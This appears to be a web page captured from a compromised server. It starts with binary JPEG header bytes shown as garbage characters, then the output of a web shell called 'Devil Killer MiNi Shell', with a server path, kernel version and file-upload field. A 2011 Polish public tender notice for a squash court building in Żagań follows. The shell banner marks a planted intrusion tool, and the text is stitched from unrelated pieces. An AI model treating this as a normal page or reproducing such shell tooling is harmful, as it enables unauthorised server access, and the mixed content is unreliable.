JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110413/76688-N-2011.html

<p class="kh_header"><b>Żagań: Budowa budynku o funkcji sportowo - usługowej obejmującego dwa niezależne korty do gry w SQUASH wraz z zapleczem sanitarnym i punktem gastronomicznym w Żaganiu, na terenie Kompleksu - Turystyczno - Rekreacyjnego przy ulicy Kochanowskiego na działce ewid. Nr 1844/68 - II etap.</b><br>
<b>Numer ogłoszenia: 76688 - 2011; data zamieszczenia: 13.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Pałac Książęcy sp. z o. o. , ul. Szprotawska 4, 68-100 Żagań, woj. lubuskie, tel. 068 4776464, faks 068 4776462.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.palac.zagan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: miejska spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku o funkcji sportowo - usługowej obejmującego dwa niezależne korty do gry w SQUASH wraz z zapleczem sanitarnym i punktem gastronomicznym w Żaganiu, na terenie Kompleksu - Turystyczno - Rekreacyjnego przy ulicy Kochanowskiego na działce ewid. Nr 1844/68 - II etap..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CPV    45.21.20.00-6   
Roboty budowlane w zakresie budowy wypoczynkowych, sportowych, kulturalnych, hotelowych i restauracyjnych obiektów budowlanych.
 
Budowa budynku o funkcji sportowo - usługowej obejmującego dwa niezależne korty do gry w SQUASH wraz z zapleczem sanitarnym i punktem gastronomicznym w Żaganiu przy ulicy Kochanowskiego na działce ewid. Nr 1844/68 - II etap.
(Kategoria obiektu XV) 

3.1. Przedmiot zamówienia obejmuje:
Budowę wolnostojącego budynku o funkcji sportowo - usługowej obejmującego dwa niezależne korty do gry w SQUASH wraz z zapleczem sanitarnym i punktem gastronomicznym.

Projektowane pomieszczenia przyziemia:
- 1.01 hol + recepcja - 31,16 m2
- 1.02 kawiarnia - 20,75 m2
- 1.03 magazyn - 4,22 m2
- 1.04 pomieszczenie socjalne - 4,17 m2
- 1.05 wc damskie + niepełnosprawnych  - 4,94 m2
- 1.06 wc męskie - 5,47 m2
- 1.07 pomieszczenie porządkowe - 3,20 m2
- 1.08 pomieszczenie personelu - 5,29 m2
- 1.09 komunikacja - 18,96 m2
- 1.10 szatnia męska - 8,14 m2
- 1.11 umywalnia męska - 10,04 m2
- 1.12 umywalnia damska - 8,14 m2
- 1.13 szatnia damska - 10,04 m2
- 1.14 komunikacja - 12,28 m2
- 1.15 sala squash Nr 1 - 66,63 m2
- 1.16 komunikacja - 12,28 m2
- 1.17 sala squash Nr 2 - 66,63 m2

Projektowane pomieszczenia piętra technicznego:
- 2.01 pomieszczenie centrali wentylacyjnej 23,91 m2

Charakterystyczne parametry techniczne budynku.
Wysokość budynku 4,14÷8,18 m
Wysokość pomieszczeń przyziemia w świetle 3,00 m
Wysokość sali squash w świetle 6,00 m
Powierzchnia zabudowy Pz=336,10 m2
Powierzchnia całkowita Pc=403,06 m2
Powierzchnia użytkowa Pu=316,25 m2
Kubatura V=2219,71 m3

Zamówienie obejmuje II etap budowy, obecnie zostały wykonane roboty rozbiórkowe, roboty ziemne, ławy i ściany fundamentowe, izolacje ław i ścian fundamentowych, ocieplenie ścian fundamentowych, wylane podbetony pod warstwy posadzkowe. Zostały doprowadzone sieci wod. - kan., c.w.u., C.O. (z budynku Krytej Pływalni) oraz wykonana kanalizacja deszczowa. Wykonany został uziom fundamentowy. Zostało przygotowane i dostarczone na budowę całe sprefabrykowane zbrojenie.

Zamówienie obejmuje dostawę i montaż strefy SQUASH (1 szt.) w systemie Mc Will z atestami World Squash Federation, obejmującą ściany z paneli drewnianych, ściennych z dodatkowym wypełnieniem wygłuszającym ściany przedniej, konstrukcję szklaną ściany tylnej i specjalną podłogę drewnianą, oświetlenie kortu oraz całość wyposażenia drobnego (rakiety, piłki, itp.) 

Druga strefa SQUASH (klatka) zostanie zamontowana  przez innego wykonawcę, w ramach innego zamówienia publicznego - przeniesienie strefy SQUASH z budynku Krytej Pływalni.

3.2. Zakres prac w szczególności obejmuje : roboty budowlane, roboty wykończeniowe, roboty ziemne instalacyjne - przyłącze energetyczne, roboty instalacyjne, montaż kompletnej obudowy (klatki) do gry w SQUASH 1 szt., dostawa wyposażenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 8. WADIUM 
8.1. Zamawiający żąda wniesienia wadium.
8.2. Wadium w wysokości 39 000,00 PLN (słownie: trzydzieści dziewięć tysięcy złotych) należy wnieść przed upływem terminu składania ofert. 
8.3. Wadium należy wnieść w jednej z niżej wymienionych form: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
    oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze 
    poręczeniem pieniężnym; 
 3) gwarancjach bankowych; 
 4) gwarancjach ubezpieczeniowych; 
 5) poręczeniach udzielanych przez podmioty, o których mowa w art.6b 
     ust.5 pkt.  2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej 
     Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz.275). 
8.4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek 
bankowy wskazany przez zamawiającego Nr: 
       BPS S.A. o w Legnicy 23 1930 1044 2280 0254 1534 0001 
z dopiskiem: Wadium - zamówienie publiczne, budowa budynku do gry w SQUASH II etap i przechowuje się na tym rachunku. 
8.5. Wadium wniesione w pieniądzu uznaje się za wniesione w sposób 
prawidłowy, gdy kwota wadium zostanie zaksięgowana  na wskazanym
koncie Zamawiającego nie później, jak przed upływem terminu składania 
ofert.
8.6. Zamawiający zwraca niezwłocznie wadium, jeżeli : 
1) upłynął termin związania ofertą; 
2) zawarto umowę w sprawie zamówienia publicznego i wniesiono 
    zabezpieczenie należytego wykonania tej umowy;
3) zamawiający unieważnił postępowanie o udzielenie zamówienia, a 
    protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich 
    wnoszenia.  
8.7. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
1) który wycofał ofertę przed upływem terminu składania ofert; 
2) który został wykluczony z postępowania; 
3) którego oferta została odrzucona. 
8.8. Zamawiający żąda ponownego wniesienia wadium przez wykonawców, 
którym zwrócono wadium na podstawie  pkt.  8.7 ppkt. 2 i 3 SIWZ, jeżeli w 
wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność 
wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą 
wadium w terminie określonym przez zamawiającego.
8.9. Wadium wniesione w pieniądzu zamawiający zwraca wraz z odsetkami 
wynikającymi z umowy rachunku bankowego, na którym było ono 
przechowywane, pomniejszone o koszty prowadzenia rachunku 
bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek  
bankowy wskazany przez wykonawcę.    
8.10.Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli : 
1) wykonawca w odpowiedzi na wezwanie o uzupełnienie oświadczeń, 
    dokumentów lub pełnomocnictw, zgodnie z art.26 ust.3 i art.25 ust.1 
    Ustawy  Prawo zamówień publicznych/ nie złożył żądanych 
    dokumentów, oświadczeń czy też pełnomocnictw, chyba że udowodni, 
     że wynika to z przyczyn nie leżących po jego stronie.
8.11.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, 
 którego oferta została wybrana: 
   1) odmówił podpisania umowy w sprawie zamówienia publicznego na 
        warunkach określonych w ofercie; 
   2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
   3) zawarcie umowy w sprawie zamówienia publicznego stało się 
       niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>12.1.Cena oferty wyrażona w PLN o wartości brutto powinna uwzględniać wszystkie zobowiązania związane  z realizacją przedmiotowej roboty budowlanej, w tym koszty  określone w punkcie 3.3. SIWZ,  musi być podana cyfrowo i słownie z dokładnością do dwóch miejsc po przecinku, musi zawierać  należny podatek  VAT. 

12.2.Prawidłowe ustalenie podatku VAT należy do obowiązków Wykonawcy, zgodnie z przepisami ustawy o podatku od towarów i usług oraz podatku akcyzowym.

12.3. Cena musi być tylko jedna; nie dopuszcza się wariantowości cen.

12.4.Wykonawca jest  zobowiązany sporządzić kalkulację ceny ofertowej w  oparciu o załączony przez zamawiającego przedmiar robót, uwzględniając  dodatkowo  koszty, o  których mowa w  punkcie 3.3  opisu przedmiot Zamówienia, niezbędne do prawidłowej realizacji zamówienia.  Oferta  powinna  zawierać informację odnośnie  zastosowanych  przez  Wykonawcę  stawek  i narzutów   tj :   Rg   zł,  KO   %,  KZ %,  Zysk   %.

12.5. Przed wyliczeniem ceny w  ofercie Wykonawca powinien: 
         -  dokładnie i szczegółowo zapoznać się  z opisem przedmiotu zamówienia; 
         -  uzyskać wszystkie niezbędne do sporządzenia oferty informacje, mające wpływ na prawidłowe ustalenie ceny realizowanego zamówienia;
         -  dokonać wizji w terenie - w miejscu realizacji przedmiotu zamówienia.

Rozdział 13 
OPIS  KRYTERIÓW  I  ICH ZNACZENIE PRZY WYBORZE OFERTY, SPOSÓB  OCENY OFERT

13.1.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert. Niedopuszczalne jest prowadzenie między Zamawiającym a Wykonawcą negocjacji dotyczących złożonej oferty oraz dokonywanie jakichkolwiek zmian w jej treści, z wyjątkiem   zmian określonych w punkcie 13.2.

13.2. Zamawiający poprawia w ofercie : 
      1) oczywiste omyłki pisarskie;
      2) oczywiste omyłki rachunkowe z uwzględnieniem konsekwencji rachunkowych 
           dokonanych poprawek; 
      3) inne omyłki polegające na niezgodności oferty ze Specyfikacją Istotnych Warunków Zamówienia, nie powodujące istotnych zmian w treści oferty 
          - niezwłocznie zawiadamiając o tym Wykonawcę, którego oferta została poprawiona.

13.3.Zamawiający w celu ustalenia, czy oferta zawiera rażąco niską cenę  w stosunku do przedmiotu zamówienia, zwraca się w formie pisemnej do Wykonawcy o udzielenie w określonym terminie wyjaśnień dotyczących  elementów oferty mających wpływ na wysokość ceny.     

13.4.Zamawiający, oceniając wyjaśnienia, bierze pod uwagę obiektywne czynniki, w szczególności oszczędność metody wykonania zamówienia, wybrane   rozwiązania techniczne, wyjątkowo sprzyjające warunki wykonania zamówienia dostępne dla Wykonawcy, oryginalność projektu Wykonawcy oraz wpływ   pomocy publicznej udzielonej na podstawie odrębnych przepisów. 

13.5.Zamawiający odrzuci ofertę, jeżeli:
       1) jest niezgodna z ustawą;
       2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,
           z zastrzeżeniem treści art.87 ust.2 pkt 3 ustawy Prawo zamówień publicznych;
       3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o
           zwalczeniu nieuczciwej konkurencji;
       4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia; 
       5) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu 
            o udzielenie zamówienia, lub nie zaproszonego do składania ofert;
       6) zawiera błędy w obliczeniu ceny;
       7) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art.87 ust.2 pkt.3 ustawy Pzp,
       8) jest nieważna na podstawie odrębnych przepisów.

13.6.Zamawiający odrzuca również  ofertę Wykonawcy, który nie złożył wyjaśnień lub jeżeli dokonana ocena wyjaśnień wraz z dostarczonymi dowodami potwierdza, że oferta zawiera rażąco niską cenę w stosunku do przedmiotu   zamówienia.  

13.7.Zamawiający wybiera ofertę najkorzystniejszą, na podstawie  - Kryterium:        
Cena - 100 %      (cena brutto) 

13.8.Przy ocenie kryterium: Cena, oferty będą punktowane w oparciu o  wynik działania  matematycznego, w następujący sposób :  

         stosunek oferty z najniższą ceną brutto spośród ważnych ofert
C= -----------------------------------------------------------------------------------------------x100%
         do ceny  brutto badanej oferty

Maksymalna ilość punktów, jaką po uwzględnieniu kryterium może osiągnąć oferta  od członka Komisji to 100 pkt. Łączna ilość punktów, którą może otrzymać oferta  równa się ilości punktów otrzymanej od 1 członka Komisji  Przetargowej (w wyniku działania matematycznego) x ilość członków Komisji  Przetargowej biorących udział w ocenie oferty. 

13.9.Zamawiający za najkorzystniejszą ofertę uzna ofertę z największą ilością uzyskanych punktów.    

13.10.Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że zostały  złożone oferty o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy  złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert  dodatkowych. 

13.11.Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach. 

13.12.Zamawiający unieważnia postępowanie o udzielenie zamówienia jeżeli: 
       1) nie złożono żadnej oferty nie podlegającej odrzuceniu;
       2) cena najkorzystniejszej oferty lub oferta z najniższą ceną  przewyższa kwotę, którą        
           Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia,  chyba że  Zamawiający może zwiększyć te kwotę do ceny najkorzystniejszej oferty;       
  3) w przypadkach, o których mowa w punkcie 13.10 Specyfikacji Istotnych Warunków  Zamówienia, zostały złożone oferty dodatkowe o takiej samej cenie,        
       4) wystąpiła istotna zmiana okoliczności powodująca, że prowadzenie postępowania    lub wykonanie zamówienia nie leży w interesie publicznym,  czego nie można było wcześniej przewidzieć,
      5) postępowanie obarczone jest niemożliwą do usunięcia wadą uniemożliwiającą zawarcie ważnej umowy w sprawie zamówienia  publicznego. 

13.13.O unieważnieniu postępowania o udzielenie zamówienia Zamawiający zawiadamia równocześnie wszystkich Wykonawców, którzy: 
      1) ubiegali się o udzielenie zamówienia - w przypadku unieważnienia  postępowania przed upływem terminu składania ofert, 
      2) złożyli oferty - w przypadku unieważnienia postępowania po upływie terminu 
          składania ofert,
          -  podając uzasadnienie faktyczne i prawne.

13.14.W przypadku unieważnienia postępowania o udzielenie zamówienia   publicznego z przyczyn leżących po stronie Zamawiającego, Wykonawcom którzy złożyli oferty nie podlegające odrzuceniu, przysługuje roszczenie o zwrot uzasadnionych kosztów uczestnictwa w postępowaniu, w szczególności kosztów  przygotowania oferty.

13.15.W przypadku unieważnienia postępowania o udzielenie zamówienia,  Zamawiający na wniosek Wykonawcy, który ubiegał się o udzielenie  zamówienia, zawiadamia o wszczęciu kolejnego postępowania, które dotyczy  tego samego przedmiotu zamówienia lub obejmuje ten sam przedmiot   zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.5.Opis sposobu dokonywania oceny spełnienia warunków określonych  w punkcie 5.1 Specyfikacji Istotnych Warunków Zamówienia: 
1) w  zakresie  posiadania  przez Wykonawcę uprawnień do wykonywania określonej działalności lub czynność, Zamawiający nie żąda od Wykonawcy potwierdzenia posiadania uprawnień do wykonywania działalności, gdyż  przepisy prawa nie  nakładają  obowiązku posiadania takowych uprawnień;  
2) w zakresie  posiadania wiedzy i doświadczenia Zamawiający uzna za spełniającego ten  Wymóg, Wykonawcę, który w okresie ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  wykonał co najmniej 2 roboty budowlane odpowiadające przedmiotowi zamówienia polegające na    budowie budynku o charakterze sportowym (hala sportowa, sala sportowa) o kubaturze nie mniejszej niż kubatura przedmiotu zamówienia oraz o wartości co najmniej 700.000,00 PLN/netto 
    Na potwierdzenie spełnienia  tego warunku Wykonawca złoży wraz z ofertą  dokument  określony  w punkcie 6.1 podpunkt 2 Specyfikacji Istotnych   Warunków Zamówienia wraz z załączonymi  do niego dokumentami potwierdzającymi, że roboty te zostały wykonane zgodnie  z zasadami  sztuki  budowlanej i prawidłowo ukończone.
        Wykonawcy występujący wspólnie o udzielenie zamówienia publicznego mogą spełnić powyższy warunek łącznie. 
        Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.   Wykonawca w takiej  sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował  zasobami  niezbędnymi do realizacji zamówienia, w  szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania odpowiednim potencjałem technicznym oraz osobami    zdolnymi do wykonania zamówienia, Zamawiający uzna za spełniającego te wymogi 
tego Wykonawcę, który będzie dysponował co  najmniej jedną osobą uprawnioną do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej bez ograniczeń, jedną osobą do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, jedną osobą do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych bez ograniczeń.
Na potwierdzenie pełnienia  tego warunku Wykonawca złoży wraz z  ofertą dokument określony w  punkcie 6.1 podpunkt 3 SIWZ. 
Wykonawcy występujący wspólnie powyższy warunek mogą spełnić łącznie. 
W zakresie dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca 
może polegać na  potencjale technicznym innych podmiotów,  niezależnie od 
charakteru  prawnego łączących go z nimi stosunków. 
     Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował  zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów  do  oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy wykonywaniu  zamówienia, oraz składając dokumenty  określone w punkcie 6.1 podpunkt 4 SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki    dotyczące : 
   1) posiadania uprawnień  do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa  nakładają obowiązek ich posiadania;           
   2) posiadania  wiedzy i doświadczenia; 
   3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;	 
   4) sytuacji ekonomicznej i finansowej; 

5.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia np. w formie Konsorcjum.

5.3. W przypadku wspólnego ubiegania się, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie  zamówienia publicznego  albo do  reprezentowania w postępowaniu i zawarcia  umowy w  sprawie  zamówienia publicznego. Na potwierdzenie ustanowienia pełnomocnika Wykonawcy załączają do oferty stosowne  pełnomocnictwo.  

5.4. Jeżeli oferta Wykonawców ubiegających się wspólnie o udzielenie zamówienia, zostanie wybrana, Zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych  Wykonawców.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4) w zakresie sytuacji ekonomicznej i finansowej, Zamawiający uzna za spełniającego te wymogi tego Wykonawcę, który  będzie ubezpieczony   od odpowiedzialności cywilnej w zakresie prowadzonej działalności  gospodarczej związanej z przedmiotem  zamówienia i na potwierdzenie spełnienia tego warunku złoży wraz z ofertą  dokument określony w  punkcie 6.1 podpunkt 5 Specyfikacji Istotnych Warunków Zamówienia. 
       Wykonawcy występujący wspólnie  powyższy warunek mogą spełnić łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

